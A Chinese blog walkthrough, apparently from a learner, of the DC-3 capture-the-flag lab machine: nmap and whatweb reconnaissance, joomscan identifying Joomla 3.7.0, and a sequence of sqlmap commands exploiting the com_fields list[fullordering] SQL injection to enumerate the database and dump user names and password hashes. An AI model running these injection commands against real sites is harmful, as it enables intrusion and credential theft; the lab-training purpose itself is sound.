[PHP知识库] DC-3靶机

开发: C++知识库 Java知识库 JavaScript Python PHP知识库人工智能区块链大数据移动开发嵌入式开发工具数据结构与算法开发测试游戏开发网络协议系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑笔记本显卡显示器固态硬盘硬盘耳机手机 iphone vivo oppo 小米华为单反装机图拉丁

-> PHP知识库 -> DC-3靶机 -> 正文阅读

[PHP知识库]DC-3靶机

ifconfig

nmap 192.168.61.0/24

nmap -A -p- 192.168.61.131

使用网站指纹工具whatweb识别靶机网址使用的web服务、系统版本、CMS系统等

whatweb http://192.168.61.131

发现靶机使用Joomla内容管理系统

使用joomscan扫描工具扫描Joomla相关配置内容、已知漏洞等等

扫描后得知Joomla版本3.7.0，管理员登录页面，及一些可以访问的网站目录

joomscan --u 192.168.61.131

打开admin登陆地址

使用searchsploit工具查找Joomla 3.7.0 版本存在的漏洞

发现一个sql注入漏洞?，后面还附带了资料

看人家的过程是要保存再查看的，但是不知道怎么保存，先略过了

sqlmap -u "http://192.168.61.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]?

?查到数据库

查当前数据库（joomladb）

sqlmap -u "http://192.168.61.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --current-db -p list[fullordering]

sqlmap -u "http://192.168.61.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" --tables ?-p list[fullordering]

?#_users表可以先试试

sqlmap -u "http://192.168.61.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" --columns ?-p list[fullordering]

?再查password和username

sqlmap -u "http://192.168.61.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" -C "name,password" --dump -p list[fullordering]